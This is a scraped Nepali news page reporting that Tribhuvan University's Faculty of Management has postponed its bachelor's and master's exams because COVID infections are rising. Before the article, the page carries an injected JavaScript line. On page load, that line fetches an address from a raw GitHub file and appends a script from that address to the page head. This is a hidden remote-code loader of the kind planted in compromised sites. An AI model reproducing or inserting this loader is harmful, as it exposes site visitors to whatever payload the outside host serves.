;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन २७,
भदौ दोस्रो हप्ताका लागि तय भएको त्रिवि व्यवस्थापन संकायको परीक्षा स्थगित भएको छ । कोरोना संक्रमण बढिरहेको तथा विभिन्न जिल्लामा निषेधाज्ञा चलिरहेकाले भदौ दोस्रो हप्ता हुने भनिएको स्नातक र स्नातकोत्तर तहको परीक्षा स्थगित गर्ने निर्णय भएको सहायक डिन प्राध्यापक डाक्टर ध्रुववकुमार गौतमले निकालेको सूचनामा उल्लेख छ ।
लकडाउन हटेसँगै त्रिविको व्यवस्थापन संकायले भदौ दोस्रो हप्ता परीक्षा लिने तयारी गरेको थियो ।file Photo
फेसबुक प्रतिक्रियाहरु